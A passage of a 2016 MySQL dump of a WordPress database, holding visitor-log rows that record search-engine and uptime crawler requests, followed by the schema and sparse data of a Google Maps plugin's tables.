+https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(7684,'0b_3e5053b3b50ff8d1ef25c5a72a81f6c6','1466598499','89.248.171.63','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7687,'0b_bdc7792fd89be93c1538cbafccf67c55','1466645941','89.248.172.173','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7688,'0b_4ea196b72490cafe20a78e45b7a1ac46','1467817883','123.125.67.206','123.125.67.206','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(7689,'0b_dbf25987d263fb690c68b5a4139d3334','1468587207','123.125.71.92','baiduspider-123-125-71-92.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(7690,'0b_e730ab98c821b3b02e73c366b3bf6306','1468882380','169.54.233.121','79.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7691,'0b_e58ae9c84900b462273484a89bc2da20','1469087513','169.54.233.126','7e.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7692,'0b_41d3264a15a4e741cd767be60137f8e7','1469932109','169.54.244.75','4b.f4.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7693,'0b_5a8487b99df5a4be4404692822dec7f2','1470135719','169.54.244.78','4e.f4.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7694,'0b_aad198579bae4f0ba3e58e9aac4fe409','1471323411','104.200.25.243','li774-243.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/0.2.19; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7695,'0b_fffaa3d4755efc88b3f6deb8b41a0591','1471329086','168.1.128.37','25.80.01a8.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7696,'0b_68d88a957cd8c7af9ec2f94611a993c6','1471362036','45.33.46.216','li996-216.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/0.2.22; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7697,'0b_588b526c352a7f42ec9688f617dc1e95','1472278750','104.200.25.243','li774-243.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/0.2.43; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(7698,'0b_f0e454ea8066847ab016c4e242ef1b1a','1472769546','169.54.233.124','7c.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7699,'0b_e7f4322f7f028fd70cc122205e78c747','1472947283','45.79.71.122','li1170-122.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7700,'0b_f191eb4f94dd03ecc701b1d045dd78cd','1473056663','45.79.95.64','li1194-64.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7701,'0b_b38bd7700c441b291d634773a7f78e8b','1473384193','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7702,'0b_118ee2fcc71431df9ca2768f23f716b7','1473852530','168.1.128.37','25.80.01a8.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7703,'0b_b8fc4f90cdbec5b050d53bb169f0d28d','1473978559','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7704,'0b_b8fc4f90cdbec5b050d53bb169f0d28d','1473978562','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7705,'0b_b8fc4f90cdbec5b050d53bb169f0d28d','1473978563','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7706,'0b_1a09f6b55f74fa8b258eee069a84b159','1473979050','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7707,'0b_1a09f6b55f74fa8b258eee069a84b159','1473979052','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7708,'0b_1a09f6b55f74fa8b258eee069a84b159','1473979052','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7709,'0b_3fd397f43a8793d68b6c04f0c84215fd','1474123796','45.79.95.64','li1194-64.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7710,'0b_3fd397f43a8793d68b6c04f0c84215fd','1474123799','45.79.95.64','li1194-64.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7711,'0b_73d00a3adca88815c2eac991d143f7aa','1474171693','168.1.128.35','23.80.01a8.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7712,'0b_25479f603828d7cdda330b95cda0a539','1474185099','45.79.71.122','li1170-122.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7713,'0b_25479f603828d7cdda330b95cda0a539','1474185102','45.79.71.122','li1170-122.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7714,'0b_45469b732165b7ecb638f085aef44f38','1474323603','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7715,'0b_45469b732165b7ecb638f085aef44f38','1474323606','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7716,'0b_7b7d41123f59e581df465aa41ade06fe','1474399954','45.79.95.64','li1194-64.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7717,'0b_7b7d41123f59e581df465aa41ade06fe','1474399957','45.79.95.64','li1194-64.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7718,'0b_3bd0fcdfaac7dd5191b5ea08c7ede7ab','1474420329','45.79.103.178','li1202-178.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7719,'0b_3bd0fcdfaac7dd5191b5ea08c7ede7ab','1474420331','45.79.103.178','li1202-178.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(7720,'0b_6428858504d3e7c9b21241132e8a60de','1474961209','93.174.93.164','no-reverse-dns-configured.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7721,'0b_50bff29078db73222132c6570ab05c5e','1476098175','169.56.71.42','169.56.71.42','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7722,'0b_32be0b59ddfd4b37dcbf0785605e2c0c','1476414382','169.56.71.41','169.56.71.41','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7723,'0b_f02fecb0f662be49bb40b5ec6339fcf5','1477283453','169.54.233.125','7d.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0); /*!40000 ALTER TABLE `wp_wassup_tmp` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wpgmza` -- DROP TABLE IF EXISTS `wp_wpgmza`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wpgmza` ( `id` int(11) NOT NULL AUTO_INCREMENT, `map_id` int(11) NOT NULL, `address` varchar(700) NOT NULL, `description` mediumtext NOT NULL, `pic` varchar(700) NOT NULL, `link` varchar(700) NOT NULL, `icon` varchar(700) NOT NULL, `lat` varchar(100) NOT NULL, `lng` varchar(100) NOT NULL, `anim` varchar(3) NOT NULL, `title` varchar(700) NOT NULL, `infoopen` varchar(3) NOT NULL, `category` varchar(500) NOT NULL, `approved` tinyint(1) DEFAULT '1', `retina` tinyint(1) DEFAULT '0', PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wpgmza` -- LOCK TABLES `wp_wpgmza` WRITE; /*!40000 ALTER TABLE `wp_wpgmza` DISABLE KEYS */; INSERT INTO `wp_wpgmza` VALUES (1,1,'California','','','','','36.778261','-119.4179323999','','','','0',1,0); /*!40000 ALTER TABLE `wp_wpgmza` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wpgmza_categories` -- DROP TABLE IF EXISTS `wp_wpgmza_categories`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wpgmza_categories` ( `id` int(11) NOT NULL AUTO_INCREMENT, `active` tinyint(1) NOT NULL, `category_name` varchar(50) NOT NULL, `category_icon` varchar(700) NOT NULL, `retina` tinyint(1) DEFAULT '0', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wpgmza_categories` -- LOCK TABLES `wp_wpgmza_categories` WRITE; /*!40000 ALTER TABLE `wp_wpgmza_categories` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_wpgmza_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wpgmza_category_maps` -- DROP TABLE IF EXISTS `wp_wpgmza_category_maps`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wpgmza_category_maps` ( `id` int(11) NOT NULL AUTO_INCREMENT, `cat_id` int(11) NOT NULL, `map_id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wpgmza_category_maps` -- LOCK TABLES `wp_wpgmza_category_maps` WRITE; /*!40000 ALTER TABLE `wp_wpgmza_category_maps` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_wpgmza_category_maps` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wpgmza_maps` -- DROP TABLE IF EXISTS `wp_wpgmza_maps`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wpgmza_maps` ( `id` int(11) NOT NULL AUTO_INCREMENT, `map_title` varchar(50) NOT NULL, `map_width` varchar(6) NOT NULL, `map_height` varchar(6) NOT NULL, `map_start_lat` varchar(700) NOT NULL, `map_start_lng` varchar(700) NOT NULL, `map_start_location` varchar(700) NOT NULL, `map_start_zoom` int(10) NOT NULL, `default_marker` varchar(700) NOT NULL, `type` int(10) NOT NULL, `alignment` int(10) NOT NULL, `directions_enabled` int(10) NOT NULL, `styling_enabled` int(10) NOT NULL, `styling_json` mediumtext NOT NULL, `active` int(1) NOT NULL, `kml` varchar(700) NOT NULL, `bicycle` int(10) NOT NULL, `traffic` int(10) NOT NULL, `dbox` int(10) NOT NULL, `dbox_width` varchar(10) NOT NULL, `listmarkers` int(10) NOT NULL, `listmarkers_advanced` int(10) NOT NULL, `filterbycat` tinyint(1) NOT NULL, `ugm_enabled` int(10) NOT NULL, `ugm_category_enabled` tinyint(1) NOT NULL, `fusion` varchar(100) NOT NULL, `map_width_type` varchar(3) NOT NULL, `map_height_type` varchar(3) NOT NULL, `mass_marker_support` int(10) NOT NULL, `ugm_access` int(10) NOT NULL, `order_markers_by` int(10) NOT NULL, `order_markers_choice` int(10) NOT NULL, `show_user_location` int(3) NOT NULL, `default_to` varchar(700) NOT NULL, `other_settings` longtext NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wpgmza_maps` -- LOCK TABLES `wp_wpgmza_maps` WRITE; /*!40000 ALTER TABLE `wp_wpgmza_maps` DISABLE KEYS */; INSERT INTO `wp_wpgmza_maps` VALUES (1,'My first map','100','400','45.950464398418106','-109.81550500000003','45.950464398418106,-109.81550500000003',2,'0',1,0,1,0,'',0,'',2,2,1,'250',0,0,0,0,0,'','%','px',1,0,1,2,0,'',''); /*!40000 ALTER TABLE `wp_wpgmza_maps` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wpgmza_polygon` -- DROP TABLE IF EXISTS `wp_wpgmza_polygon`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wpgmza_polygon` ( `id` int(11) NOT NULL AUTO_INCREMENT, `map_id` int(11) NOT NULL, `polydata` longtext NOT NULL, `linecolor` varchar(7) NOT NULL, `lineopacity` varchar(7) NOT NULL, `fillcolor` varchar(7) NOT NULL, `opacity` varchar(3) NOT NULL, `title` varchar(250) NOT NULL, `link` varchar(700) NOT NULL, `ohfillcolor` varchar(7) NOT NULL, `ohlinecolor` varchar(7) NOT NULL, `ohopacity` varchar(3) NOT NULL, `polyname` varchar(100) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wpgmza_polygon` -- LOCK TABLES `wp_wpgmza_polygon` WRITE; /*!40000 ALTER TABLE `wp_wpgmza_polygon` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_wpgmza_polygon` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wpgmza_polylines` -- DROP TABLE IF EXISTS `wp_wpgmza_polylines`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_wpgmza_polylines` ( `id` int(11) NOT NULL AUTO_INCREMENT, `map_id` int(11) NOT NULL, `polydata` longtext NOT NULL, `linecolor` varchar(7) NOT NULL, `linethickness` varchar(3) NOT NULL, `opacity` varchar(3) NOT NULL, `polyname` varchar(100) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_wpgmza_polylines` -- LOCK TABLES `wp_wpgmza_polylines` WRITE; /*!40000 ALTER TABLE `wp_wpgmza_polylines` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_wpgmza_polylines` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping routines for database 'empirewp' -- /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2016-12-13 7:25:03